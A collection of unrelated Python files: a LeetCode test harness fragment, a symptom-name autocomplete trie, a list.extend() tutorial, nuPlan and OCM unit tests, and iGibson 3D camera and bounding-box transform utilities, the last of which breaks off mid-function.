str(Solution().minMutation("AACCGGTT", "AAACGGTA",
["AACCGGTA", "AACCGCTA", "AAACGGTA"])))
print()
print('Example 3:')
print('Input : ')
print(
'start = "AAAAACCC", end = "AACCCCCC", bank =["AAAACCCC","AAACCCCC","AACCCCCC"]'
)
print('Expected :')
print('3')
print('Output :')
print(
str(Solution().minMutation("AAAAACCC", "AACCCCCC",
["AAAACCCC", "AAACCCCC", "AACCCCCC"])))
print()
pass
# @lc main=end
|
import pandas as pd
import os
import logging
class TrieNode():
def __init__(self):
self.children = {}
self.rank = 0
self.isEnd = False
self.data = None
class AutocompleteSystem():
def __init__(self):
self.root = TrieNode()
self.searchWord = ''
symps = pd.read_csv('data/symptom_ids.csv')
self.symptoms = []
for i in range(len(symps.columns)):
if i > 0 and i != 170:
key = str(i)
self.symptoms.append(symps[key][0].lower())
self.formTrie(self.symptoms)
def formTrie(self, symptoms):
for symptom in symptoms:
self._addRecord(symptom, 0)
def _addRecord(self, symptom, hotdegree):
node = self.root
for ch in list(symptom):
if not node.children.get(ch):
node.children[ch] = TrieNode()
node = node.children[ch]
node.isEnd = True
node.data = symptom
node.rank -= hotdegree
'''def Search(self, symptom):
node = self.root
found = True
for ch in list(symptom):
if not node.children.get(ch):
found = False
break
node = node.children[ch]
return node and node.isEnd and found'''
def suggestions(self, node, word):
if node.isEnd:
self.word_list.append((node.rank, word))
for ch,n in node.children.items():
self.suggestions(n, word + ch)
def search(self, symptom):
self.word_list = []
node = self.root
nonexistent = False
search_char = ''
for ch in list(symptom.lower()):
if not node.children.get(ch):
nonexistent = True
break
search_char += ch
node = node.children[ch]
if nonexistent:
return []
self.suggestions(node, search_char)
res = [s[1].title() for s in sorted(self.word_list)[:5]]
logging.debug(res)
return res
def get_symptom_id(self, symptom_name):
symptom_name = symptom_name.lower()
if (symptom_name in self.symptoms):
return self.symptoms.index(symptom_name)
else:
return -1
def get_symptom_name(self, symptom_id):
return self.symptoms[int(symptom_id)]
def select(self,symptom_id):
if 0 <= symptom_id < len(self.symptoms):
self._addRecord(self.symptoms[symptom_id], 1)
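# Illustrative usage (a minimal sketch; assumes data/symptom_ids.csv is present, as
# required by the constructor above):
if __name__ == '__main__':
    logging.basicConfig(level=logging.DEBUG)
    ac = AutocompleteSystem()
    print(ac.search('head'))              # up to 5 ranked suggestions for the prefix 'head'
    sid = ac.get_symptom_id('Headache')   # -1 if 'Headache' is not in the symptom list
    if sid >= 0:
        ac.select(sid)                    # bump its rank for future searches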
|
myl1 = [1,2,3,4, 'Hello', 'Python']
myl2 = ['is','awesome']
myl1.extend(myl2) # EX1: extending with a list appends each of its elements
print(myl1)# EX2
myl3 = ['Stay', 'Happy','Stay']
myl4 = 'Safe'
myl3.extend(myl4)# EX3: extending with a string appends each character ('S', 'a', 'f', 'e')
print(myl3)# EX4
myl5 = ['True',10.1]
myset1 = {30,10,20}
myl5.extend(myset1)# EX5: extending with a set appends its elements in arbitrary order
print(myl5)# EX6
|
import json
import os
import tempfile
import unittest
from pathlib import Path
from bokeh.document.document import Document
from bokeh.palettes import Bokeh, Category20, Set3
from nuplan.planning.metrics.metric_engine import MetricsEngine
from nuplan.planning.metrics.metric_file import MetricFile, MetricFileKey
from nuplan.planning.metrics.metric_result import MetricStatistics, MetricStatisticsType, Statistic, TimeSeries
from nuplan.planning.nuboard.base.base_tab import BaseTab
from nuplan.planning.nuboard.base.data_class import NuBoardFile
from nuplan.planning.nuboard.base.experiment_file_data import ExperimentFileData
from nuplan.planning.simulation.main_callback.metric_file_callback import MetricFileCallback
class TestBaseTab(unittest.TestCase):
"""Test base_tab functionality."""
def set_up_dummy_simulation(
self,
simulation_path: Path,
log_name: str,
planner_name: str,
scenario_type: str,
scenario_name: str,
) -> None:
"""
Set up dummy simulation data.
:param simulation_path: Simulation path.
:param log_name: Log name.
:param planner_name: Planner name.
:param scenario_type: Scenario type.
:param scenario_name: Scenario name.
"""
json_file = Path(os.path.dirname(os.path.realpath(__file__))) / "json/test_simulation_tile.json"
with open(json_file, "r") as f:
simulation_data = json.load(f)
# Save to a tmp folder
save_path = simulation_path / planner_name / scenario_type / log_name / scenario_name
save_path.mkdir(parents=True, exist_ok=True)
save_file = save_path / "1.json"
with open(save_file, "w") as f:
json.dump(simulation_data, f)
def set_up_dummy_metric(
self, metric_path: Path, log_name: str, planner_name: str, scenario_type: str, scenario_name: str
) -> None:
"""
Set up dummy metric results.
:param metric_path: Metric path.
:param log_name: Log name.
:param planner_name: Planner name.
:param scenario_type: Scenario type.
:param scenario_name: Scenario name.
"""
# Set up dummy metric statistics
statistics = {
MetricStatisticsType.MAX: Statistic(
name="ego_max_acceleration", unit="meters_per_second_squared", value=2.0
),
MetricStatisticsType.MIN: Statistic(
name="ego_min_acceleration", unit="meters_per_second_squared", value=0.0
),
MetricStatisticsType.P90: Statistic(
name="ego_p90_acceleration", unit="meters_per_second_squared", value=1.0
),
}
time_stamps = [0, 1, 2]
accel = [0.0, 1.0, 2.0]
time_series = TimeSeries(unit="meters_per_second_squared", time_stamps=list(time_stamps), values=list(accel))
result = MetricStatistics(
metric_computator="ego_acceleration",
name="ego_acceleration_statistics",
statistics=statistics,
time_series=time_series,
metric_category="Dynamic",
metric_score=1,
)
# Set up dummy metric file
key = MetricFileKey(
metric_name="ego_acceleration",
scenario_name=scenario_name,
log_name=log_name,
scenario_type=scenario_type,
planner_name=planner_name,
)
# Set up a dummy metric engine and save the results to a metric file.
metric_engine = MetricsEngine(main_save_path=metric_path, timestamp=0)
metric_files = {"ego_acceleration": [MetricFile(key=key, metric_statistics=[result])]}
metric_engine.write_to_files(metric_files=metric_files)
# Integrate to a metric file
metric_file_callback = MetricFileCallback(metric_save_path=str(metric_path))
metric_file_callback.on_run_simulation_end()
def setUp(self) -> None:
"""Set up a nuboard base tab."""
self.tmp_dir = tempfile.TemporaryDirectory()
self.nuboard_file = NuBoardFile(
simulation_main_path=self.tmp_dir.name,
metric_main_path=self.tmp_dir.name,
metric_folder="metrics",
simulation_folder="simulations",
aggregator_metric_folder="aggregator_metric",
current_path=Path(self.tmp_dir.name),
)
doc = Document()
log_name = 'dummy_log'
planner_name = "SimplePlanner"
scenario_type = "Test"
scenario_name = "Dummy_scene"
# Set up dummy metric files
metric_path = Path(self.nuboard_file.metric_main_path) / self.nuboard_file.metric_folder
metric_path.mkdir(exist_ok=True, parents=True)
self.set_up_dummy_metric(
metric_path=metric_path,
log_name=log_name,
planner_name=planner_name,
scenario_name=scenario_name,
scenario_type=scenario_type,
)
# Set up dummy simulation files
simulation_path = Path(self.nuboard_file.simulation_main_path) / self.nuboard_file.simulation_folder
simulation_path.mkdir(exist_ok=True, parents=True)
self.set_up_dummy_simulation(
simulation_path,
log_name=log_name,
planner_name=planner_name,
scenario_type=scenario_type,
scenario_name=scenario_name,
)
color_palettes = Category20[20] + Set3[12] + Bokeh[8]
experiment_file_data = ExperimentFileData(file_paths=[], color_palettes=color_palettes)
self.base_tab = BaseTab(doc=doc, experiment_file_data=experiment_file_data)
def test_update_experiment_file_data(self) -> None:
"""Test update experiment file data."""
self.base_tab.experiment_file_data.update_data(file_paths=[self.nuboard_file])
self.assertEqual(len(self.base_tab.experiment_file_data.available_metric_statistics_names), 1)
self.assertEqual(len(self.base_tab.experiment_file_data.simulation_scenario_keys), 1)
def test_file_paths_on_change(self) -> None:
"""Test file_paths_on_change feature."""
self.base_tab.experiment_file_data.update_data(file_paths=[self.nuboard_file])
self.assertRaises(
NotImplementedError, self.base_tab.file_paths_on_change, self.base_tab.experiment_file_data, [0]
)
def tearDown(self) -> None:
"""Remove all temporary folders and files."""
self.tmp_dir.cleanup()
if __name__ == "__main__":
unittest.main()
|
from unittest import TestCase
from unittest.mock import patch
from reconcile.utils.ocm import OCM
class TestVersionBlocked(TestCase):
@patch.object(OCM, '_init_access_token')
@patch.object(OCM, '_init_request_headers')
@patch.object(OCM, '_init_clusters')
# pylint: disable=arguments-differ
def setUp(self, ocm_init_access_token,
ocm_init_request_headers, ocm_init_clusters):
self.ocm = OCM('name', 'url', 'tid', 'turl', 'ot')
def test_no_blocked_versions(self):
result = self.ocm.version_blocked('1.2.3')
self.assertFalse(result)
def test_version_blocked(self):
self.ocm.blocked_versions = ['1.2.3']
result = self.ocm.version_blocked('1.2.3')
self.assertTrue(result)
def test_version_not_blocked(self):
self.ocm.blocked_versions = ['1.2.3']
result = self.ocm.version_blocked('1.2.4')
self.assertFalse(result)
def test_version_blocked_multiple(self):
self.ocm.blocked_versions = ['1.2.3', '1.2.4']
result = self.ocm.version_blocked('1.2.3')
self.assertTrue(result)
def test_version_blocked_regex(self):
self.ocm.blocked_versions = [r'^.*-fc\..*$']
result = self.ocm.version_blocked('1.2.3-fc.1')
self.assertTrue(result)
def test_version_not_blocked_regex(self):
self.ocm.blocked_versions = [r'^.*-fc\..*$']
result = self.ocm.version_blocked('1.2.3-rc.1')
self.assertFalse(result)
class TestVersionRegex(TestCase):
@patch.object(OCM, '_init_access_token')
@patch.object(OCM, '_init_request_headers')
@patch.object(OCM, '_init_clusters')
# pylint: disable=arguments-differ
def test_invalid_regex(self, ocm_init_access_token,
ocm_init_request_headers, ocm_init_clusters):
with self.assertRaises(TypeError):
OCM('name', 'url', 'tid', 'turl', 'ot',
blocked_versions=['['])
|
import numpy as np
import trimesh
import torch
from shapely.geometry import Polygon, Point
from gibson2.utils.mesh_util import homotrans, lookat
from configs import data_config
from utils.mesh_utils import normalize_to_unit_square
from utils.basic_utils import recursively_to, get_any_array
def vector_rotation(v1, v2, axis, left_hand=False, range_pi=False):
"""
Calculate rotation around axis in rad from v1 to v2, where v1 and v2 are 3-dim vectors.
The rotation is counter-clockwise when the axis points toward the viewer,
as defined in a right-handed coordinate system.
Parameters
----------
v1: n x 3 numpy array or tensor
v2: n x 3 numpy array or tensor
Returns
-------
n-dim vector in the range of [0, 2 * pi)
"""
if isinstance(v1, torch.Tensor):
backend, atan2 = torch, torch.atan2
else:
backend, atan2 = np, np.arctan2
ori = atan2((backend.cross(v2, v1) * axis).sum(axis=-1), (v2 * v1).sum(axis=-1)) * (1. if left_hand else -1.)
if not range_pi:
ori = backend.remainder(ori, np.pi * 2)
return ori
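# Illustrative example (added sketch, not part of the original module):
#   >>> v1 = np.array([[1., 0., 0.]])
#   >>> v2 = np.array([[0., 1., 0.]])
#   >>> vector_rotation(v1, v2, np.array([0., 0., 1.]))
#   array([1.57079633])   # 90 degrees counter-clockwise around +z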
def point_polygon_dis(points, polygon):
backend = torch if isinstance(points, torch.Tensor) else np
if (polygon[0] != polygon[-1]).any():
polygon = backend.cat([polygon, polygon[:1]], 0)
dis = backend.zeros([len(points), len(polygon) - 1], dtype=points.dtype)
if backend == torch:
dis = dis.to(points.device)
# find distance to each line segment
for i_line, (p1, p2) in enumerate(zip(polygon[:-1], polygon[1:])):
dis[:, i_line] = point_line_segment_dis(points, p1, p2)
# use nearest distance
dis = dis.min(axis=-1)
if backend == torch:
dis = dis[0]
# points inside room layout should have negative distance
layout_2d = Polygon(polygon)
inside_layout = [layout_2d.contains(Point(c)) for c in points]
dis[inside_layout] *= -1
return dis
def point_line_segment_dis(points, line_start, line_end):
backend = torch if isinstance(points, torch.Tensor) else np
line_vec = line_end - line_start
r = (line_vec * (points - line_start)).sum(-1) / backend.linalg.norm(line_vec, axis=-1) ** 2
line_length = backend.linalg.norm(line_vec, axis=-1)
dis_start = backend.linalg.norm(points - line_start, axis=-1)
dis_end = backend.linalg.norm(points - line_end, axis=-1)
dis_line = backend.sqrt(backend.abs(dis_start.pow(2) - (r * line_length).pow(2)) + 1e-8)
dis_start = dis_start * (r < 0)
dis_end = dis_end * (r > 1)
dis_line = dis_line * ((r <= 1) & (r > 0))
return dis_line + dis_start + dis_end
def interpolate_line(p1, p2, num=30):
t = np.expand_dims(np.linspace(0, 1, num=num, dtype=np.float32), 1)
points = p1 * (1 - t) + t * p2
return points
def num2bins(bins, loc):
'''
Given bins and a value, compute which bin the value falls into and its distance to the bin center.
:param bins: list
The bins, e.g. [[-x, 0], [0, x]]
:param loc: float
The location
:return cls: int, bin index.
The index of the bin containing the value, used for classification.
:return reg: float, [-0.5, 0.5].
The distance to the center of the corresponding bin.
'''
if bins.ndim == 1:
backend = torch if isinstance(loc, torch.Tensor) else np
dist = [backend.abs(loc - b) for b in bins]
dist = backend.stack(dist, -1)
cls = backend.argmin(dist, -1)
return cls
else:
width_bin = bins[0][1] - bins[0][0]
# get the distance to the center from each bin.
if isinstance(loc, torch.Tensor):
dist = [torch.abs(loc - (bn[0] + bn[1]) / 2) for bn in bins]
dist = torch.stack(dist, -1)
cls = torch.argmin(dist, -1)
bins = torch.tensor(bins, device=loc.device)
reg = (loc - bins[cls].mean(-1)) / width_bin
else:
dist = ([float(abs(loc - float(bn[0] + bn[1]) / 2)) for bn in bins])
cls = dist.index(min(dist))
reg = float(loc - float(bins[cls][0] + bins[cls][1]) / 2) / float(width_bin)
return cls, reg
def label_or_num_from_cls_reg(cls, reg=None, bins=None, return_score=False, threshold=0.5):
if isinstance(cls, torch.Tensor):
if cls.dtype == torch.float32:
if cls.shape[-1] == 1:
cls = cls.squeeze(-1)
score = torch.sigmoid(cls)
label = score > threshold
else:
score = torch.softmax(cls, dim=-1)
score, label = score.max(-1)
else:
label = cls
score = torch.ones_like(label, device=cls.device, dtype=torch.float32)
else:
label = cls
score = np.ones_like(label, dtype=np.float32)
if bins is None:
if cls.shape[-1] == 2 and reg is None:
if isinstance(cls, torch.Tensor):
bin_center = label.type(torch.bool)
else:
bin_center = label.astype(np.bool)
else:
bin_center = label
else:
if bins.ndim == 1:
bin_center = bins[label]
else:
bin_width = (bins[0][1] - bins[0][0])
bin_center = (bins[label, 0] + bins[label, 1]) / 2
if reg is None:
return (bin_center, score) if return_score else bin_center
if label is not cls:
reg = torch.gather(reg, 1, label.unsqueeze(-1)).squeeze(1)
num = bin_center + reg * bin_width
return (num, score) if return_score else num
def size2reg(size, class_id=None, avg_key='size_avg'):
size_avg = data_config.metadata[avg_key]
if class_id is not None:
size_avg = size_avg[class_id]
if isinstance(size, torch.Tensor):
size_avg = torch.FloatTensor(size_avg).to(size.device)
size_residual = size / size_avg - 1
return size_residual
def bins2layout(layout_total3d):
lo_ori_reg, lo_ori_cls, centroid_reg, size_reg = \
layout_total3d['ori_reg'], layout_total3d['ori_cls'], \
layout_total3d['centroid_reg'], layout_total3d['size_reg']
bins = recursively_to(data_config.metadata, dtype='tensor', device=lo_ori_reg.device)
cuboid_layout = {
'ori': label_or_num_from_cls_reg(lo_ori_cls, lo_ori_reg, bins['layout_ori_bins']),
'centroid_total3d': centroid_reg + bins['layout_centroid_avg'],
'size': (size_reg + 1) * bins['layout_size_avg']
}
return cuboid_layout
def bins2camera(layout_total3d):
pitch_cls, pitch_reg, roll_cls, roll_reg = \
layout_total3d['pitch_cls'], layout_total3d['pitch_reg'], \
layout_total3d['roll_cls'], layout_total3d['roll_reg']
pitch_bins = torch.FloatTensor(data_config.metadata['pitch_bins']).to(pitch_cls.device)
roll_bins = torch.FloatTensor(data_config.metadata['roll_bins']).to(pitch_cls.device)
return {
'pitch': label_or_num_from_cls_reg(pitch_cls, pitch_reg, pitch_bins),
'roll': label_or_num_from_cls_reg(roll_cls, roll_reg, roll_bins),
}
def bins2bdb3d(data):
bdb3d_pix = {}
objs = data['objs']
transform = IGTransform(data)
if 'K' in data['camera']:
bdb2d, bdb3d = objs['bdb2d'], objs['bdb3d']
bdb2d_center = torch.stack([bdb2d['x1'] + bdb2d['x2'], bdb2d['y1'] + bdb2d['y2']], 1) / 2
bdb2d_wh = torch.stack([bdb2d['x2'] - bdb2d['x1'], bdb2d['y2'] - bdb2d['y1']], 1)
bdb3d_pix['center'] = bdb2d_center - bdb2d_wh * objs['delta2d']
dis_name = 'dis' # try to regress dis instead of depth in Total3D
else:
bfov, bdb3d = objs['bfov'], objs['bdb3d']
bfov_center = torch.stack([bfov['lon'], bfov['lat']], 1)
bfov_wh = torch.stack([bfov['x_fov'], bfov['y_fov']], 1)
bdb3d_pix['center'] = transform.camrad2pix(bfov_center - bfov_wh * objs['delta2d'])
dis_name = 'dis'
bins = recursively_to(data_config.metadata, dtype='tensor', device=bdb3d_pix['center'].device)
size_avg, dis_bins, ori_bins = bins['size_avg'], bins['dis_bins'], bins['ori_bins']
bdb3d_pix['size'] = (bdb3d['size_reg'] + 1) * size_avg[objs['label'], :]
bdb3d_pix[dis_name], bdb3d_pix[dis_name + '_score'] = label_or_num_from_cls_reg(
bdb3d['dis_cls'], bdb3d['dis_reg'], dis_bins, return_score=True)
bdb3d_pix['ori'], bdb3d_pix['ori_score'] = label_or_num_from_cls_reg(
bdb3d['ori_cls'], bdb3d['ori_reg'], ori_bins, return_score=True)
return bdb3d_pix
def bdb3d_corners(bdb3d: (dict, np.ndarray)):
"""
Get ordered corners of given 3D bounding box dict or disordered corners
Parameters
----------
bdb3d: 3D bounding box dict
Returns
-------
8 x 3 numpy array of bounding box corner points in the following order:
right-forward-down
left-forward-down
right-back-down
left-back-down
right-forward-up
left-forward-up
right-back-up
left-back-up
"""
if isinstance(bdb3d, np.ndarray):
centroid = np.mean(bdb3d, axis=0)
z = bdb3d[:, -1]
surfaces = []
for surface in (bdb3d[z < centroid[-1]], bdb3d[z >= centroid[-1]]):
surface_2d = surface[:, :2]
center_2d = centroid[:2]
vectors = surface_2d - center_2d
angles = np.arctan2(vectors[:, 0], vectors[:, 1])
orders = np.argsort(-angles)
surfaces.append(surface[orders][(0, 1, 3, 2), :])
corners = np.concatenate(surfaces)
else:
corners = np.unpackbits(np.arange(8, dtype=np.uint8)[..., np.newaxis],
axis=1, bitorder='little', count=-5).astype(np.float32)
corners = corners - 0.5
if isinstance(bdb3d['size'], torch.Tensor):
corners = torch.from_numpy(corners).to(bdb3d['size'].device)
corners = IGTransform.obj2frame(corners, bdb3d)
return corners
def expand_bdb3d(bdb3d, dis):
bdb3d = bdb3d.copy()
size = bdb3d['size']
size = size + dis * 2
size[size <= 0.01] = 0.01
bdb3d['size'] = size
return bdb3d
def bdb3d_from_front_face(front_face, length):
"""
Get 3D bounding box dict from given front face and length
Parameters
----------
front_face: four 3D corners of front face
right-forward-down
left-forward-down
right-forward-up
left-forward-up
length: length along y axis (forward-backward axis)
Returns
-------
bdb3d dict
"""
up = front_face[2] - front_face[0] # z
left = front_face[1] - front_face[0] # x
back = np.cross(up, left)
back = back / np.linalg.norm(back) * length # y
basis = np.stack([left, back, up])
size = np.linalg.norm(basis, axis=1)
basis = basis.T / size
centroid = front_face.sum(0) / 4 + back / 2
return {
'centroid': centroid,
'basis': basis,
'size': size
}
def bdb3d_from_corners(corners: np.ndarray):
front_face = corners[(0, 1, 4, 5), :]
length = np.linalg.norm(corners[0] - corners[3])
bdb3d = bdb3d_from_front_face(front_face, length)
return bdb3d
bdb3d_axis_map = {'forward': [0, -1, 0], 'back': [0, 1, 0], 'left': [1, 0, 0], 'right': [-1, 0, 0],
'up': [0, 0, 1], 'down': [0, 0, -1], 'x': [1, 0, 0], 'y': [0, 1, 0], 'z': [0, 0, 1]}
def bdb3d_axis(bdb3d, axis='forward'):
basis = bdb3d['basis']
axis_obj = np.array(bdb3d_axis_map[axis], dtype=np.float32)
if isinstance(basis, torch.Tensor):
axis_obj = torch.tensor(axis_obj, dtype=basis.dtype, device=basis.device)
axis_ori = basis @ axis_obj
return axis_ori
cam_axis_map = {'forward': [0, 0, 1], 'back': [0, 0, 1], 'left': [-1, 0, 0], 'right': [1, 0, 0],
'up': [0, -1, 0], 'down': [0, 1, 0], 'x': [1, 0, 0], 'y': [0, 1, 0], 'z': [0, 0, 1]}
def cam_axis(camera=None, axis='forward'):
axis_cam3d = np.array(cam_axis_map[axis], dtype=np.float32)
if camera is not None:
cam3d2world = camera['cam3d2world']
if isinstance(cam3d2world, torch.Tensor):
axis_cam3d = torch.tensor(axis_cam3d, dtype=cam3d2world.dtype, device=cam3d2world.device)
axis_cam3d = axis_cam3d[None, -1, None].expand(len(cam3d2world), -1, -1)
axis_cam3d = cam3d2world[..., :3, :3] @ axis_cam3d
return axis_cam3d
def points2bdb2d(points):
points = np.stack([points['x'], points['y']]).T if isinstance(points, dict) else points
if isinstance(points, torch.Tensor):
xy_max = torch.max(points, -2)[0]
xy_min = torch.min(points, -2)[0]
else:
xy_max = points.max(-2)
xy_min = points.min(-2)
return {
'x1': xy_min[..., 0],
'x2': xy_max[..., 0],
'y1': xy_min[..., 1],
'y2': xy_max[..., 1]
}
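# e.g. points2bdb2d(np.array([[10., 20.], [30., 5.]])) -> {'x1': 10.0, 'x2': 30.0, 'y1': 5.0, 'y2': 20.0}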
def contour2bfov(contour, height=None, width=None, camera=None):
if camera is None:
camera = {'height': height, 'width': width}
transform = IGTransform({'camera': camera})
contour_np = np.stack([contour['x'], contour['y']]).T if isinstance(contour, dict) else contour
bdb2d = points2bdb2d(contour_np)
center_pix = np.array([(bdb2d['x1'] + bdb2d['x2']), (bdb2d['y1'] + bdb2d['y2'])], dtype=np.float32) / 2
center_rad = transform.campix2rad(center_pix)
center_world = transform.campix2world(center_pix, 1.)
contour_world = transform.campix2world(contour_np, 1.)
transform = transform.copy()
transform.look_at(center_world)
contour_pers3d = transform.world2cam3d(contour_world)
contour_rad = transform.cam3d2rad(contour_pers3d)
min_rad = contour_rad.min(axis=0)
max_rad = contour_rad.max(axis=0)
fov_rad = np.max(np.abs(np.stack([max_rad, min_rad])), 0) * 2
bfov = {'lon': center_rad[0], 'lat': center_rad[1], 'x_fov': fov_rad[0], 'y_fov': fov_rad[1]}
bfov = {k: float(v) for k, v in bfov.items()}
return bfov
class IGTransform:
"""
3D transformations for iGibson data
world: right-hand coordinate of iGibson (z-up)
cam3d: x-right, y-down, z-forward
cam2d: x-right, y-down
object: x-left, y-back, z-up (defined by iGibson)
"""
def __init__(self, data: dict=None, split='objs'):
self.data = data
self.camera = data['camera'] if data else {}
self.split = split
if isinstance(self.camera, dict) and self.camera \
and 'world2cam3d' not in self.camera and 'cam3d2world' not in self.camera:
if any(k not in self.camera for k in ('pos', 'target', 'up')):
self.set_camera_to_world_center()
else:
self.look_at()
@classmethod
def level_look_at(cls, data, target):
data = data.copy()
camera = data['camera'].copy()
if isinstance(target, torch.Tensor):
target = target.clone()
else:
target = target.copy()
camera['target'] = target
        camera['target'][..., -1] = camera['pos'][..., -1]  # level the new target to the camera height (cf. set_camera_level)
data['camera'] = camera
recentered_trans = cls(data)
return recentered_trans
@classmethod
def world_centered(cls, camera):
transform_centered = cls()
transform_centered.set_camera_to_world_center()
sample = get_any_array(camera)
if isinstance(sample, torch.Tensor):
transform_centered.camera = recursively_to(
transform_centered.camera, dtype='tensor', device=sample.device)
transform_centered.camera.update({k: camera[k][0] for k in ('height', 'width')})
return transform_centered
def look_at(self, camera=None):
if camera is not None:
if isinstance(camera, dict):
self.camera = camera.copy()
else:
self.camera['target'] = camera
world2cam3d = lookat(self.camera['pos'], self.camera['target'], self.camera['up'])
world2cam3d = np.array([
[1, 0, 0, 0],
[0, -1, 0, 0],
[0, 0, -1, 0],
[0, 0, 0, 1]
], dtype=np.float32) @ world2cam3d
self.camera['world2cam3d'] = world2cam3d
self.camera['cam3d2world'] = np.linalg.inv(world2cam3d)
return self
def get_camera_angle(self):
"""
Get the yaw, pitch, roll angle from the camera.
The initial state of camera is defined as:
world_x-forward, world_y-left, world_z-up
# The rotation is right-handed around world frame (?) with the following order (?):
# yaw-world_z, pitch-world_y, roll-world_z
Returns
-------
yaw, pitch, roll angles in rad
"""
R = self['cam3d2world']
backend, atan2 = (torch, torch.atan2) if isinstance(R, torch.Tensor) else (np, np.arctan2)
yaw = atan2(R[..., 1, 2], R[..., 0, 2])
pitch = - atan2(R[..., 2, 2], backend.sqrt(R[..., 0, 2] ** 2 + R[..., 1, 2] ** 2))
roll = atan2(R[..., 2, 0], - R[..., 2, 1])
return yaw, pitch, roll
def set_camera_angle(self, yaw, pitch, roll):
"""
Set camera rotation from yaw, pitch, roll angles in rad.
Parameters
----------
yaw, pitch, roll angles in rad
"""
pitch = -pitch
roll = -roll
R = self.camera['cam3d2world']
use_torch = isinstance(R, torch.Tensor)
R = R.clone() if use_torch else R.copy()
backend, inverse = (torch, torch.inverse) if use_torch else (np, np.linalg.inv)
if use_torch:
            yaw, pitch, roll = [v if isinstance(v, torch.Tensor) else torch.tensor(v) for v in (yaw, pitch, roll)]
R[..., 0, 2] = backend.cos(yaw) * backend.cos(pitch)
R[..., 0, 1] = - backend.sin(yaw) * backend.sin(roll) + backend.cos(yaw) * backend.cos(roll) * backend.sin(pitch)
R[..., 0, 0] = backend.cos(roll) * backend.sin(yaw) + backend.cos(yaw) * backend.sin(pitch) * backend.sin(roll)
R[..., 2, 2] = backend.sin(pitch)
R[..., 2, 1] = - backend.cos(pitch) * backend.cos(roll)
R[..., 2, 0] = - backend.cos(pitch) * backend.sin(roll)
R[..., 1, 2] = backend.cos(pitch) * backend.sin(yaw)
R[..., 1, 1] = backend.cos(yaw) * backend.sin(roll) + backend.cos(roll) * backend.sin(yaw) * backend.sin(pitch)
R[..., 1, 0] = - backend.cos(yaw) * backend.cos(roll) + backend.sin(yaw) * backend.sin(pitch) * backend.sin(roll)
self.camera['cam3d2world'] = R
self.camera['world2cam3d'] = inverse(R)
target = self.camera['target']
target = target.clone() if use_torch else target.copy()
target[..., :2] = 0
target[..., 2] = 1
self.camera['target'] = self.cam3d2world(target)
up = self.camera['up']
up = up.clone() if use_torch else up.copy()
up[..., (0, 2)] = 0
up[..., 1] = -1
self.camera['up'] = (self.camera['cam3d2world'][..., :3, :3] @ up[..., None])[..., 0]
return self
def copy(self):
data = self.data.copy()
data['camera'] = self.camera.copy()
return IGTransform(data, split=self.split)
def set_camera_to_world_center(self):
self.camera['pos'] = np.zeros(3, np.float32)
self.camera['target'] = np.array([1, 0, 0], np.float32)
self.camera['up'] = np.array([0, 0, 1], np.float32)
self.look_at()
return self
def set_camera_like_total3d(self):
# set world frame coordinate to camera center
# and rotate x axis to camera y-z plane around z axis
pos = self.camera['pos']
use_torch = isinstance(pos, torch.Tensor)
inverse = torch.inverse if use_torch else np.linalg.inv
self.camera['pos'] = pos.clone() if use_torch else pos.copy()
self.camera['pos'][:] = 0
cam3d2world = self.camera['cam3d2world']
cam3d2world = cam3d2world.clone() if isinstance(pos, torch.Tensor) else cam3d2world.copy()
cam3d2world[..., :3, 3] = 0
self.camera['cam3d2world'] = cam3d2world
self.camera['world2cam3d'] = inverse(cam3d2world)
_, pitch, roll = self.get_camera_angle()
self.set_camera_angle(0., pitch, roll)
return self
def set_camera_level(self):
self.camera['target'][-1] = self.camera['pos'][-1]
self.camera['up'] = np.array([0, 0, 1], np.float32)
self.look_at()
return self
def camrad2pix(self, camrad):
"""
Transform longitude and latitude of a point to panorama pixel coordinate.
Parameters
----------
camrad: n x 2 numpy array
Returns
-------
n x 2 numpy array of xy coordinate in pixel
x: (left) 0 --> (width - 1) (right)
y: (up) 0 --> (height - 1) (down)
"""
if 'K' in self.camera:
raise NotImplementedError
if isinstance(camrad, torch.Tensor):
campix = torch.empty_like(camrad, dtype=torch.float32)
else:
campix = np.empty_like(camrad, dtype=np.float32)
width, height = self['width'], self['height']
if isinstance(camrad, torch.Tensor):
width, height = [x.view([-1] + [1] * (camrad.dim() - 2)) for x in (width, height)]
campix[..., 0] = camrad[..., 0] * width / (2. * np.pi) + width / 2. + 0.5
campix[..., 1] = camrad[..., 1] * height / np.pi + height / 2. + 0.5
return campix
def campix2rad(self, campix):
backend, atan2 = (torch, torch.atan2) if isinstance(campix, torch.Tensor) else (np, np.arctan2)
camrad = backend.empty_like(campix, dtype=backend.float32)
if 'K' in self.camera:
camrad[..., 0] = atan2(
campix[..., 0] - self['K'][..., 0, 2],
self['K'][..., 0, 0]
)
camrad[..., 1] = atan2(
campix[..., 1] - self['K'][..., 1, 2],
backend.sqrt(self['K'][..., 0, 0] ** 2 + (campix[..., 0] - self['K'][..., 0, 2]) ** 2)
/ self['K'][..., 0, 0] * self['K'][..., 1, 1]
)
else:
width, height = self['width'], self['height']
camrad[..., 0] = (campix[..., 0] - width / 2. - 0.5) / width * (2. * np.pi)
camrad[..., 1] = (campix[..., 1] - height / 2. - 0.5) / height * np.pi
return camrad
def cam3d2rad(self, cam3d):
"""
Transform 3D points in camera coordinate to longitude and latitude.
Parameters
----------
cam3d: n x 3 numpy array or bdb3d dict
Returns
-------
        n x 2 numpy array of longitude and latitude in radians
first rotate left-right, then rotate up-down
longitude: (left) -pi -- 0 --> +pi (right)
latitude: (up) -pi/2 -- 0 --> +pi/2 (down)
"""
backend, atan2 = (torch, torch.atan2) if isinstance(cam3d, torch.Tensor) else (np, np.arctan2)
lon = atan2(cam3d[..., 0], cam3d[..., 2])
lat = backend.arcsin(cam3d[..., 1] / backend.linalg.norm(cam3d, axis=-1))
return backend.stack([lon, lat], -1)
def camrad23d(self, rad, dis):
backend = torch if isinstance(rad, torch.Tensor) else np
proj_dis = backend.cos(rad[..., 1]) * dis
x = backend.sin(rad[..., 0]) * proj_dis
y = backend.sin(rad[..., 1]) * dis
z = backend.cos(rad[..., 0]) * proj_dis
cam3d = backend.stack([x, y, z]).T
return cam3d
def camrad2world(self, rad, dis):
return self.cam3d2world(self.camrad23d(rad, dis))
def world2camrad(self, world):
return self.cam3d2rad(self.world2cam3d(world))
def cam3d2pix(self, cam3d):
"""
Transform 3D points from camera coordinate to pixel coordinate.
Parameters
----------
cam3d: n x 3 numpy array or bdb3d dict
Returns
-------
for 3D points: n x 2 numpy array of xy in pixel.
x: (left) 0 --> width - 1 (right)
y: (up) 0 --> height - 1 (down)
"""
if isinstance(cam3d, dict):
